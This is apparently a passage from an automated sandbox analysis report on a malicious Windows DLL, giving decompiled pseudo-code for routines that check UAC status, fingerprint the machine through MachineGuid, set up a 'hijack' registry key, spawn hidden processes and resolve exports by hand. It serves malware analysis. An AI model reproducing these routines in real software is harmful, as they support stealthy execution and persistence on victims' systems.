                                                                                                                                                                  • Opcode Fuzzy Hash: 47feec5f4e07d9a8727310987636f621792a510bfb959471694aa5da43594d6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A516DBAD00218ABDB14DB98DC92FDE73B9EB4C304F044199E54997341EA31FB54CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001DC60(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                  				struct _OSVERSIONINFOW _v284;
                                                                                                                                                                  				char _v547;
                                                                                                                                                                  				char _v548;
                                                                                                                                                                  				char _v819;
                                                                                                                                                                  				char _v820;
                                                                                                                                                                  				char _v824;
                                                                                                                                                                  				void* _t31;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  				void* _t53;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t69;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  
                                                                                                                                                                  				_t69 = __esi;
                                                                                                                                                                  				_t68 = __edi;
                                                                                                                                                                  				_t57 = __ebx;
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					return _t31;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v820 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v819, 0, 0x103);
                                                                                                                                                                  				_v548 = 0;
                                                                                                                                                                  				_t58 =  &_v547;
                                                                                                                                                                  				E1000CF80(_t68,  &_v547, 0, 0x103);
                                                                                                                                                                  				_t65 =  &(_v284.dwMajorVersion);
                                                                                                                                                                  				E1000CF80(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
                                                                                                                                                                  				_t74 = _t71 + 0x24;
                                                                                                                                                                  				_v284.dwOSVersionInfoSize = 0x114;
                                                                                                                                                                  				GetVersionExW( &_v284);
                                                                                                                                                                  				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D2A0() == 0) {
                                                                                                                                                                  					_t38 = E1001D840(_t68,  &_v548);
                                                                                                                                                                  					_t75 = _t74 + 4;
                                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                                  						L11:
                                                                                                                                                                  						E1001D330(_t58,  &_v548);
                                                                                                                                                                  						_t65 =  &_v820;
                                                                                                                                                                  						_t41 = E1001CD50( &_v820, 0x104,  &_v824);
                                                                                                                                                                  						_t77 = _t75 + 0x10;
                                                                                                                                                                  						__eflags = _t41;
                                                                                                                                                                  						if(_t41 >= 0) {
                                                                                                                                                                  							_t65 = 0x104 - _v824;
                                                                                                                                                                  							__eflags = 0x104;
                                                                                                                                                                  							E1001CCB0( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
                                                                                                                                                                  							_t77 = _t77 + 0xc;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t49 = E1001D5C0(_t68,  &_v548);
                                                                                                                                                                  					_t75 = _t75 + 4;
                                                                                                                                                                  					__eflags = _t49;
                                                                                                                                                                  					if(_t49 != 0) {
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t58 =  &_v548;
                                                                                                                                                                  					_t50 = E1001DAD0(_t68,  &_v548);
                                                                                                                                                                  					_t75 = _t75 + 4;
                                                                                                                                                                  					__eflags = _t50;
                                                                                                                                                                  					if(_t50 != 0) {
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t65 =  &_v548;
                                                                                                                                                                  					_t51 = E1001D3D0(_t57, _t68, _t69,  &_v548);
                                                                                                                                                                  					_t77 = _t75 + 4;
                                                                                                                                                                  					__eflags = _t51;
                                                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t53 = E1001DAD0(_t68,  &_v548);
                                                                                                                                                                  					_t77 = _t74 + 4;
                                                                                                                                                                  					_t84 = _t53;
                                                                                                                                                                  					if(_t53 != 0) {
                                                                                                                                                                  						_t65 =  &_v548;
                                                                                                                                                                  						E1001D330( &_v548,  &_v548);
                                                                                                                                                                  						E1001D380(_t84,  &_v820,  &_v548);
                                                                                                                                                                  						_t77 = _t77 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					L13:
                                                                                                                                                                  					if(_v820 == 0) {
                                                                                                                                                                  						_t65 =  &_v820;
                                                                                                                                                                  						E1001D000("Mid2Failed", 0x104,  &_v820);
                                                                                                                                                                  						_t77 = _t77 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					return E1000D903(_t65, _a4, 0x104,  &_v820);
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DC88
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCA5
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCBB
                                                                                                                                                                  • GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
                                                                                                                                                                  • _strcpy_s.LIBCMT ref: 1001DE09
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                    • Part of subcall function 1001DAD0: wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                    • Part of subcall function 1001DAD0: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                    • Part of subcall function 1001DAD0: DeviceIoControl.KERNEL32 ref: 1001DBB0
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                    • Part of subcall function 1001DAD0: CloseHandle.KERNEL32(000000FF), ref: 1001DC14
                                                                                                                                                                    • Part of subcall function 1001D330: _strlen.LIBCMT ref: 1001D33E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                                  • String ID: Mid2Failed
                                                                                                                                                                  • API String ID: 2934472556-1001836097
                                                                                                                                                                  • Opcode ID: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction ID: 1ac3354d9508f96bf62ada26ae39cff1003ebfb3b345a0bbc8a583754ab99eb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 794142F5D0021967DB14F7A0AD86FEA7378EB14744F4405A9EA0899042FA70FBC8CA92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A230(void* __eflags, CHAR* _a4) {
                                                                                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                  				CHAR* _v24;
                                                                                                                                                                  				struct _STARTUPINFOA _v100;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				E1000CF80(_t27,  &_v100, 0, 0x44);
                                                                                                                                                                  				_v100.cb = 0x44;
                                                                                                                                                                  				_v100.dwFlags = 1;
                                                                                                                                                                  				_v100.wShowWindow = 0;
                                                                                                                                                                  				E1000CF80(_t27,  &_v20, 0, 0x10);
                                                                                                                                                                  				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
                                                                                                                                                                  					CloseHandle(_v20.hThread);
                                                                                                                                                                  					CloseHandle(_v20);
                                                                                                                                                                  					_v24 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v24;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 1151464618-2746444292
                                                                                                                                                                  • Opcode ID: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
                                                                                                                                                                  • Instruction ID: 109a0bc55e8301458d6397c35f4bc98ddca4d2c3873fb5e4ea0d57c84511a1e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
                                                                                                                                                                  • Instruction Fuzzy Hash: 1601E1B590431DABEB00DBD0DC89FEE7779FB44704F140518FA04AB281DBB5A958CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AF10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				intOrPtr* _v16;
                                                                                                                                                                  				intOrPtr* _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				intOrPtr* _v36;
                                                                                                                                                                  				intOrPtr* _v40;
                                                                                                                                                                  				intOrPtr* _v44;
                                                                                                                                                                  				intOrPtr* _t105;
                                                                                                                                                                  				void* _t174;
                                                                                                                                                                  				void* _t176;
                                                                                                                                                                  
                                                                                                                                                                  				_t172 = __edi;
                                                                                                                                                                  				_t122 = __ebx;
                                                                                                                                                                  				_v16 = _a4;
                                                                                                                                                                  				_t4 = _v16 + 4; // 0x7d83ec45
                                                                                                                                                                  				_v24 =  *_t4;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v20 =  *_v16 + 0x78;
                                                                                                                                                                  				if( *((intOrPtr*)(_v20 + 4)) != 0) {
                                                                                                                                                                  					_v8 = _v24 +  *_v20;
                                                                                                                                                                  					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                                  						SetLastError(0x7f);
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                                  							if( *(_v8 + 0x18) != 0) {
                                                                                                                                                                  								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
                                                                                                                                                                  									L19:
                                                                                                                                                                  									_t70 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                                  									_v28 = E1000DFB8(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AAC0);
                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                  										_v12 =  *(_v28 + 4) & 0x0000ffff;
                                                                                                                                                                  										L22:
                                                                                                                                                                  										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                                  											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                                  										}
                                                                                                                                                                  										SetLastError(0x7f);
                                                                                                                                                                  										return 0;
                                                                                                                                                                  									}
                                                                                                                                                                  									SetLastError(0x7f);
                                                                                                                                                                  									return 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                                  								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                                  								_t105 = L1000CEAF(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
                                                                                                                                                                  								_t176 = _t174 + 4;
                                                                                                                                                                  								_v44 = _t105;
                                                                                                                                                                  								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
                                                                                                                                                                  								if(_v44 != 0) {
                                                                                                                                                                  									_v32 = 0;
                                                                                                                                                                  									while(_v32 <  *(_v8 + 0x18)) {
                                                                                                                                                                  										 *_v44 = _v24 +  *_v36;
                                                                                                                                                                  										 *((short*)(_v44 + 4)) =  *_v40;
                                                                                                                                                                  										_v32 = _v32 + 1;
                                                                                                                                                                  										_v36 = _v36 + 4;
                                                                                                                                                                  										_v40 = _v40 + 2;
                                                                                                                                                                  										_v44 = _v44 + 8;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t66 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                                  									E1000DA30( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AAF0);
                                                                                                                                                                  									_t174 = _t176 + 0x10;
                                                                                                                                                                  									goto L19;
                                                                                                                                                                  								}
                                                                                                                                                                  								SetLastError(0xe);
                                                                                                                                                                  								return 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							SetLastError(0x7f);
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                                  							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  							goto L22;
                                                                                                                                                                  						}
                                                                                                                                                                  						SetLastError(0x7f);
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				SetLastError(0x7f);
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}

















                                                                                                                                                                  APIs
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF42
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E1001FE50(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v311;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v575;
                                                                                                                                                                  				char _v576;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  
                                                                                                                                                                  				_t50 = __eflags;
                                                                                                                                                                  				_t41 = __edi;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E1002319D);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t43;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v576 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v575, 0, 0x103);
                                                                                                                                                                  				_v312 = 0;
                                                                                                                                                                  				E1000CF80(_t41,  &_v311, 0, 0x103);
                                                                                                                                                                  				E1001A660(__ebx, _t41, __esi, _t50,  &_v44);
                                                                                                                                                                  				GetTempPathA(0x104,  &_v576);
                                                                                                                                                                  				_push(E100011E0( &_a4));
                                                                                                                                                                  				_push(E100011E0( &_v44));
                                                                                                                                                                  				E1000CCA3(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                                  				E1001A230(_t50,  &_v312);
                                                                                                                                                                  				E100011A0( &_v44);
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				_t30 = E100011A0( &_a4);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _t30;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FE8A
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FEA7
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FEC7
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FEF2
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNEL32 ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                  • String ID: %s%s 200 %s
                                                                                                                                                                  • API String ID: 3552933064-2772210913
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F9F0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v275;
                                                                                                                                                                  				char _v276;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t20;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  
                                                                                                                                                                  				_t37 = __eflags;
                                                                                                                                                                  				_t28 = __edi;
                                                                                                                                                                  				_v276 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v275, 0, 0x103);
                                                                                                                                                                  				_v12 = 0x104;
                                                                                                                                                                  				E1001A350( &_v276,  &_v12);
                                                                                                                                                                  				E1000CDB3( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                                  				_v8 = E1001A4E0(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                                  				_t20 = E1000CCA3(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                                  				_t38 = _v8;
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					return E1000CA40(__ebx, _t28, __esi, _t38);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t20;
                                                                                                                                                                  			}











                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001A350: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                  • API String ID: 3138967372-3622423033
                                                                                                                                                                  • Opcode ID: ab9e3645ffe6a09c5898803410f9ba2ac02775f5c504d206e634dc87c7f5ca2e
                                                                                                                                                                  • Instruction ID: 9d0dca558a4647b1c94e9ab51dbd61ee89e2acb8972101442078f4140e755168
                                                                                                                                                                  • Opcode Fuzzy Hash: ab9e3645ffe6a09c5898803410f9ba2ac02775f5c504d206e634dc87c7f5ca2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F0152F9C0020CA7DB15D7A0EC46FE97778AB54304F0404A9A61856141E7B5AB88C792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001D2A0() {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = 4;
                                                                                                                                                                  				_v20 = 4;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                                  					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
                                                                                                                                                                  						_v16 = 0 | _v24 == 0x00000001;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v16;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                  Strings
                                                                                                                                                                  • EnableLUA, xrefs: 1001D2F6
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D2D4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                                  • API String ID: 3677997916-2194944742
                                                                                                                                                                  • Opcode ID: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction ID: 8e6b4177a17e8aca07570e164a523334bb235141b85f1ba5573b08480178a58a
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D01FFB6D00219FBEB04DFD1CD88BEEB7B8EB44305F104059E611B6180D7759B44CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A350(char* _a4, int* _a8) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int* _v12;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
                                                                                                                                                                  					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
                                                                                                                                                                  						_v12 = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  					return _v12;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A39C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001A3B5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
